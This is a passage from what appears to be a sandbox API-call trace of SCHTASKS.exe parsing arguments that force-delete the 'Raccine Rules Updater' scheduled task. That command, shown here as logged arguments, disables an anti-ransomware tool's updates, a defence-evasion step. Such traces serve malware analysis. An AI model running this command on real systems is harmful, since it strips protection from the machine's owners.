Size=0x14) returned 0x1c5140 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5160 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5180 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4b40 [0081.494] _memicmp (_Buf1=0x1c4b40, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x200) returned 0x1c65a0 [0081.494] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1c65a0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0081.494] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x30) returned 0x1c67a8 [0081.494] _vsnwprintf (in: _Buffer=0x1c64f8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xcf7f8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18) returned 1 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5b18) returned 0x74e [0081.494] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18 | out: hHeap=0x1b0000) returned 1 [0081.494] SetLastError (dwErrCode=0x0) [0081.494] GetThreadLocale () returned 0x409 [0081.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.494] lstrlenW (lpString="?") returned 1 [0081.494] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="create") returned 6 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="delete") returned 6 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="query") returned 5 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="change") returned 6 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="run") returned 3 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="end") returned 3 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] lstrlenW (lpString="showsid") returned 7 [0081.495] GetThreadLocale () returned 0x409 [0081.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0081.495] SetLastError (dwErrCode=0x0) [0081.495] SetLastError (dwErrCode=0x0) [0081.495] lstrlenW (lpString="/DELETE") returned 7 [0081.495] lstrlenW (lpString="-/") returned 2 [0081.495] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.495] lstrlenW (lpString="?") returned 1 [0081.495] lstrlenW (lpString="?") returned 1 [0081.495] GetProcessHeap () returned 0x1b0000 [0081.495] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4b58 [0081.495] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.495] GetProcessHeap () returned 0x1b0000 [0081.495] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xa) returned 0x1c4b70 [0081.495] lstrlenW (lpString="DELETE") returned 6 [0081.495] GetProcessHeap () returned 0x1b0000 [0081.495] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4b88 [0081.496] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.496] GetProcessHeap () returned 0x1b0000 [0081.496] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c51a0 [0081.496] _vsnwprintf (in: _Buffer=0x1c4b70, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|?|") returned 3 [0081.496] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|DELETE|") returned 8 [0081.496] lstrlenW (lpString="|?|") returned 3 [0081.496] lstrlenW (lpString="|DELETE|") returned 8 [0081.496] SetLastError (dwErrCode=0x490) [0081.496] lstrlenW (lpString="create") returned 6 [0081.496] lstrlenW (lpString="create") returned 6 [0081.496] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.496] GetProcessHeap () returned 0x1b0000 [0081.496] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b70) returned 1 [0081.496] GetProcessHeap () returned 0x1b0000 [0081.496] RtlReAllocateHeap (Heap=0x1b0000, Flags=0xc, Ptr=0x1c4b70, Size=0x14) returned 0x1c51c0 [0081.496] lstrlenW (lpString="DELETE") returned 6 [0081.496] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.496] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|create|") returned 8 [0081.496] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|DELETE|") returned 8 [0081.496] lstrlenW (lpString="|create|") returned 8 [0081.496] lstrlenW (lpString="|DELETE|") returned 8 [0081.496] StrStrIW (lpFirst="|create|", lpSrch="|DELETE|") returned 0x0 [0081.496] SetLastError (dwErrCode=0x490) [0081.496] lstrlenW (lpString="delete") returned 6 [0081.496] lstrlenW (lpString="delete") returned 6 [0081.496] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] lstrlenW (lpString="DELETE") returned 6 [0081.497] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|delete|") returned 8 [0081.497] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|DELETE|") returned 8 [0081.497] lstrlenW (lpString="|delete|") returned 8 [0081.497] lstrlenW (lpString="|DELETE|") returned 8 [0081.497] StrStrIW (lpFirst="|delete|", lpSrch="|DELETE|") returned="|delete|" [0081.497] SetLastError (dwErrCode=0x0) [0081.497] SetLastError (dwErrCode=0x0) [0081.497] SetLastError (dwErrCode=0x0) [0081.497] lstrlenW (lpString="/TN") returned 3 [0081.497] lstrlenW (lpString="-/") returned 2 [0081.497] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.497] lstrlenW (lpString="?") returned 1 [0081.497] lstrlenW (lpString="?") returned 1 [0081.497] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] lstrlenW (lpString="TN") returned 2 [0081.497] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|?|") returned 3 [0081.497] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.497] lstrlenW (lpString="|?|") returned 3 [0081.497] lstrlenW (lpString="|TN|") returned 4 [0081.497] SetLastError (dwErrCode=0x490) [0081.497] lstrlenW (lpString="create") returned 6 [0081.497] lstrlenW (lpString="create") returned 6 [0081.497] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] lstrlenW (lpString="TN") returned 2 [0081.497] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.497] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|create|") returned 8 [0081.497] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.497] lstrlenW (lpString="|create|") returned 8 [0081.497] lstrlenW (lpString="|TN|") returned 4 [0081.498] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0081.498] SetLastError (dwErrCode=0x490) [0081.498] lstrlenW (lpString="delete") returned 6 [0081.498] lstrlenW (lpString="delete") returned 6 [0081.498] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] lstrlenW (lpString="TN") returned 2 [0081.498] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|delete|") returned 8 [0081.498] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.498] lstrlenW (lpString="|delete|") returned 8 [0081.498] lstrlenW (lpString="|TN|") returned 4 [0081.498] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0081.498] SetLastError (dwErrCode=0x490) [0081.498] lstrlenW (lpString="query") returned 5 [0081.498] lstrlenW (lpString="query") returned 5 [0081.498] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] lstrlenW (lpString="TN") returned 2 [0081.498] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|query|") returned 7 [0081.498] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.498] lstrlenW (lpString="|query|") returned 7 [0081.498] lstrlenW (lpString="|TN|") returned 4 [0081.498] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0081.498] SetLastError (dwErrCode=0x490) [0081.498] lstrlenW (lpString="change") returned 6 [0081.498] lstrlenW (lpString="change") returned 6 [0081.498] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] lstrlenW (lpString="TN") returned 2 [0081.498] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.498] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|change|") returned 8 [0081.498] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.498] lstrlenW (lpString="|change|") returned 8 [0081.498] lstrlenW (lpString="|TN|") returned 4 [0081.498] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0081.499] SetLastError (dwErrCode=0x490) [0081.499] lstrlenW (lpString="run") returned 3 [0081.499] lstrlenW (lpString="run") returned 3 [0081.499] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] lstrlenW (lpString="TN") returned 2 [0081.499] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|run|") returned 5 [0081.499] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.499] lstrlenW (lpString="|run|") returned 5 [0081.499] lstrlenW (lpString="|TN|") returned 4 [0081.499] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0081.499] SetLastError (dwErrCode=0x490) [0081.499] lstrlenW (lpString="end") returned 3 [0081.499] lstrlenW (lpString="end") returned 3 [0081.499] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] lstrlenW (lpString="TN") returned 2 [0081.499] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] _vsnwprintf (in: _Buffer=0x1c51c0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|end|") returned 5 [0081.499] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.499] lstrlenW (lpString="|end|") returned 5 [0081.499] lstrlenW (lpString="|TN|") returned 4 [0081.499] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0081.499] SetLastError (dwErrCode=0x490) [0081.499] lstrlenW (lpString="showsid") returned 7 [0081.499] lstrlenW (lpString="showsid") returned 7 [0081.499] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] GetProcessHeap () returned 0x1b0000 [0081.499] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51c0) returned 1 [0081.499] GetProcessHeap () returned 0x1b0000 [0081.499] RtlReAllocateHeap (Heap=0x1b0000, Flags=0xc, Ptr=0x1c51c0, Size=0x16) returned 0x1c51e0 [0081.499] lstrlenW (lpString="TN") returned 2 [0081.499] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.499] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|showsid|") returned 9 [0081.499] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|TN|") returned 4 [0081.500] lstrlenW (lpString="|showsid|") returned 9 [0081.500] lstrlenW (lpString="|TN|") returned 4 [0081.500] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="/TN") returned 3 [0081.500] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="/TN") returned 3 [0081.500] GetProcessHeap () returned 0x1b0000 [0081.500] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x8) returned 0x1c5b18 [0081.500] GetProcessHeap () returned 0x1b0000 [0081.500] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c51c0 [0081.500] SetLastError (dwErrCode=0x0) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.500] lstrlenW (lpString="-/") returned 2 [0081.500] StrChrIW (lpStart="-/", wMatch=0x52) returned 0x0 [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.500] StrChrIW (lpStart="Raccine Rules Updater", wMatch=0x3a) returned 0x0 [0081.500] SetLastError (dwErrCode=0x490) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="Raccine Rules Updater") returned 21 [0081.500] GetProcessHeap () returned 0x1b0000 [0081.500] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x2c) returned 0x1c5b28 [0081.500] GetProcessHeap () returned 0x1b0000 [0081.500] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5200 [0081.500] SetLastError (dwErrCode=0x0) [0081.500] SetLastError (dwErrCode=0x0) [0081.500] lstrlenW (lpString="/F") returned 2 [0081.500] lstrlenW (lpString="-/") returned 2 [0081.500] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0081.500] lstrlenW (lpString="?") returned 1 [0081.500] lstrlenW (lpString="?") returned 1 [0081.501] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] lstrlenW (lpString="F") returned 1 [0081.501] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|?|") returned 3 [0081.501] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.501] lstrlenW (lpString="|?|") returned 3 [0081.501] lstrlenW (lpString="|F|") returned 3 [0081.501] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0081.501] SetLastError (dwErrCode=0x490) [0081.501] lstrlenW (lpString="create") returned 6 [0081.501] lstrlenW (lpString="create") returned 6 [0081.501] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] lstrlenW (lpString="F") returned 1 [0081.501] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|create|") returned 8 [0081.501] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.501] lstrlenW (lpString="|create|") returned 8 [0081.501] lstrlenW (lpString="|F|") returned 3 [0081.501] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0081.501] SetLastError (dwErrCode=0x490) [0081.501] lstrlenW (lpString="delete") returned 6 [0081.501] lstrlenW (lpString="delete") returned 6 [0081.501] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] lstrlenW (lpString="F") returned 1 [0081.501] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.501] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|delete|") returned 8 [0081.501] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.501] lstrlenW (lpString="|delete|") returned 8 [0081.501] lstrlenW (lpString="|F|") returned 3 [0081.501] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0081.501] SetLastError (dwErrCode=0x490) [0081.501] lstrlenW (lpString="query") returned 5 [0081.502] lstrlenW (lpString="query") returned 5 [0081.502] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] lstrlenW (lpString="F") returned 1 [0081.502] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|query|") returned 7 [0081.502] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.502] lstrlenW (lpString="|query|") returned 7 [0081.502] lstrlenW (lpString="|F|") returned 3 [0081.502] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0081.502] SetLastError (dwErrCode=0x490) [0081.502] lstrlenW (lpString="change") returned 6 [0081.502] lstrlenW (lpString="change") returned 6 [0081.502] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] lstrlenW (lpString="F") returned 1 [0081.502] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|change|") returned 8 [0081.502] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.502] lstrlenW (lpString="|change|") returned 8 [0081.502] lstrlenW (lpString="|F|") returned 3 [0081.502] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0081.502] SetLastError (dwErrCode=0x490) [0081.502] lstrlenW (lpString="run") returned 3 [0081.502] lstrlenW (lpString="run") returned 3 [0081.502] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] lstrlenW (lpString="F") returned 1 [0081.502] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.502] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|run|") returned 5 [0081.502] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.502] lstrlenW (lpString="|run|") returned 5 [0081.502] lstrlenW (lpString="|F|") returned 3 [0081.502] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0081.503] SetLastError (dwErrCode=0x490) [0081.503] lstrlenW (lpString="end") returned 3 [0081.503] lstrlenW (lpString="end") returned 3 [0081.503] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.503] lstrlenW (lpString="F") returned 1 [0081.503] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.503] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|end|") returned 5 [0081.503] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.503] lstrlenW (lpString="|end|") returned 5 [0081.503] lstrlenW (lpString="|F|") returned 3 [0081.503] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0081.503] SetLastError (dwErrCode=0x490) [0081.503] lstrlenW (lpString="showsid") returned 7 [0081.503] lstrlenW (lpString="showsid") returned 7 [0081.503] _memicmp (_Buf1=0x1c4b58, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.503] lstrlenW (lpString="F") returned 1 [0081.503] _memicmp (_Buf1=0x1c4b88, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.503] _vsnwprintf (in: _Buffer=0x1c51e0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|showsid|") returned 9 [0081.503] _vsnwprintf (in: _Buffer=0x1c51a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcf7e0 | out: _Buffer="|F|") returned 3 [0081.503] lstrlenW (lpString="|showsid|") returned 9 [0081.503] lstrlenW (lpString="|F|") returned 3 [0081.503] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0081.503] SetLastError (dwErrCode=0x490) [0081.503] SetLastError (dwErrCode=0x490) [0081.503] SetLastError (dwErrCode=0x0) [0081.503] lstrlenW (lpString="/F") returned 2 [0081.503] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0081.503] SetLastError (dwErrCode=0x490) [0081.503] SetLastError (dwErrCode=0x0) [0081.503] lstrlenW (lpString="/F") returned 2 [0081.503] GetProcessHeap () returned 0x1b0000 [0081.503] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x6) returned 0x1c5b60 [0081.503] GetProcessHeap () returned 0x1b0000 [0081.503] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5220 [0081.504] SetLastError (dwErrCode=0x0) [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5b18) returned 0x8 [0081.504] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b18 | out: hHeap=0x1b0000) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51c0) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c51c0) returned 0x14 [0081.504] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51c0 | out: hHeap=0x1b0000) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b28) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5b28) returned 0x2c [0081.504] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b28 | out: hHeap=0x1b0000) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5200) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5200) returned 0x14 [0081.504] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5200 | out: hHeap=0x1b0000) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b60) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5b60) returned 0x6 [0081.504] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5b60 | out: hHeap=0x1b0000) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5220) returned 1 [0081.504] GetProcessHeap () returned 0x1b0000 [0081.504] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5220) returned 0x14 [0081.505] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5220 | out: hHeap=0x1b0000) returned 1 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a50) returned 1 [0081.505] GetProcessHeap () returned 0x1b0000 [0081.505] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4a50) returned 0x10 [0081.505] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a50 | out: hHeap=0x1b0000) returned 1 [0081.505] SetLastError (dwErrCode=0x0) [0081.505] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0081.505] 